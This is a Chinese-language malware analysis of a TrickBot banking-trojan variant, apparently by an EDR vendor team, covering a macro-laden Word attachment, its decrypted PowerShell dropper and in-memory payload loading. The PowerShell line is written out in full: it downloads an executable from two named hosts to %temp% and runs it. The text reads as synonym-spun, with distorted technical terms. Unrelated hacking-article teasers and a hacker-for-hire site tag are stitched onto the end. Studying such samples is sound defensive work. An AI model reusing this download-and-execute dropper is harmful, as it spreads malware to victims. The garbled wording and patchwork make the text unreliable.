一、布景
最近国外安全研究人员发现TrickBot银行木马最新的样本,深服气EDR安全团队对此事进行了相关跟进,获取到了相应的样本,并对样本进行了详细剖析,承认此样本为TrickBot银行盗号木马的最新变种样本,而且此样本十分活泼,最近一段时间更新十分频频。
TrickBot银行木马是一款专门针对各国银行进行进犯的歹意样本,它之前被黑客团伙用于进犯全球多个国家的金融机构,主要是经过垃圾邮件的 *** 进行进犯,此次发现的样本会对全球数百家大型银行网站进行进犯,部分银行列表如下:
二、样本运转流程
三、样本剖析
邮件附件DOC样本(重命名为Trickbot.doc),如下所示:
打开文档之后,如下所示:
剖析DOC文件档,发现里边包括VBA宏代码,如下所示:
经过VBA宏编辑器解析DOC文档中的宏代码,如下所示:
动态调试解密里边的宏代码,经过CMD /C履行如下PowerShell脚本:
powershell “function [随机名]([string] $[随机名]){(new-object system.net.webclient).downloadfile($[随机名],’%temp%[随机名].exe’);
start-process ‘%temp%[随机名].exe’;}
try{[随机名](‘http://whitakerfamily.info/ico.ico‘)}catch{[随机名](‘http://rayanat.com/ico.ico‘)}
经过powershell脚本下载相应的TrickBot歹意程序,并履行。
TrickBot母体程序(随机名重命名为TrickBot.exe),如下所示:
1.读取样本相应的资源数据到内存中,如下所示:
资源的ID:BBVCXZIIUHGSWQ,资源数据如下所示:
2.创立窗口,发送音讯,如下所示:
3.对获取到的资源数据进行加解密相关操作,如下所示:
从程序中导入密钥1,如下所示:
从程序中导入密钥2,如下所示:
最终经过CryptEncrypt对数据进行操作,如下所示:
履行之后,在内存中将资源数据复原为一个Payload的数据,如下所示:
4.然后在内存加载复原出来的payload数据,如下所示:
5.复原出来的payload其实是一个DLL,内存加载DLL,如下所示:
定位到DLL的进口点:10001900处,如下所示:
6.判别DLL的进口函数是否为shellcode_main,如下所示:
[1] [2] [3] [4] 黑客接单网
0x01 开发Exploit 许多的模板引擎都会企图约束模板程序履行恣意代码才能,来防止应用层逻辑对表达式引擎的进犯。还有一些模板引擎则测验经过沙盒等手法来安全处理不可信的用户输入。在这些办法之下,开...
...
网络抓取结构中运用最多的莫过所以scrapy,但是咱们是否考虑过这个结构是否存在缝隙妮?5年前曾经在scrapy中爆出过XXE缝隙,但是这次咱们发现的缝隙是一个LPE。 经过该缝隙能够获得shell,...
本文介绍了怎么完结谷歌最新的XSSGame的进程,完结了这八个应战就有时机取得Nexus 5x。实际上这八个应战整体来说都不难,都是些常见的xss。通关要求是只要能弹出alert窗口即可。 第一关...
不管你是履行桌面仍是云取证,云端数据都将成为越来越重要依据来历,而且有时是仅有依据来历。即便你不从事取证作业,云拜访也能够协助你拜访已删去或以其他办法无法拜访的数据。 与智能手机或受暗码维护的桌面相似...
今日咱们来接着上一篇,讲讲WAF绕过技能的其他几个方面。 Unicode标准化 让Unicode标准化是Unicode的一个功用,用于比较看起来类似的Unicode符号。例如,符号“ª”和“ᵃ”有不同...